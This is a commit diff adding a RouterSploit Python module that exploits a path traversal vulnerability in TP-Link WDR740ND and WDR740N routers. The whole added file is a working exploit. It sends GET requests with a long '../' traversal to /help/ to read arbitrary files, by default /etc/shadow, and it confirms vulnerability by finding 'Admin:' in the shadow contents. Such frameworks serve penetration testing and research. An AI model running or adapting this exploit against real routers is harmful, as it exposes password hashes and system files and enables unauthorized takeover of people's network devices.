TP-Link WDR740ND and WDR740N Path Traversal exploit

a6b62284 · Marcin Bury · 1444f4f1 · a6b62284 · a6b62284
Commit a6b62284 authored Jun 15, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 66 additions and 0 deletions

__init__.py routersploit/modules/exploits/tplink/__init__.py +0 -0

wdr740nd_wdr740n_path_traversal.py ...odules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py +66 -0

No files found.
--- a/routersploit/modules/exploits/tplink/__init__.py
+++ b/routersploit/modules/exploits/tplink/__init__.py
--- a/routersploit/modules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py
+++ b/routersploit/modules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    print_info,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for TP-Link WDR740ND and WDR740N path traversal vulnerability.
+    If the target is vulnerable it allows to read files from the filesystem.
+    """
+    __info__ = {
+        'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
+        'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
+        'authors': [
+            'websec.ca',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal',
+        ],
+        'devices': [
+             'TP-Link WDR740ND',
+             'TP-Link WDR740N',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    filename = exploits.Option('/etc/shadow', 'File to read from the filesystem')
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            url = "{}:{}/help/../../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)
+
+            print_status("Sending payload request")
+            response = http_request(method="GET", url=url)
+            if response is None:
+                return
+
+            if response.status_code == 200 and len(response.text):
+                print_status("Reading file {}".format(self.filename))
+                print_info(response.text)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        url = "{}:{}/help/../../../../../../../../../../../../../../../../etc/shadow".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if "Admin:" in response.text:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable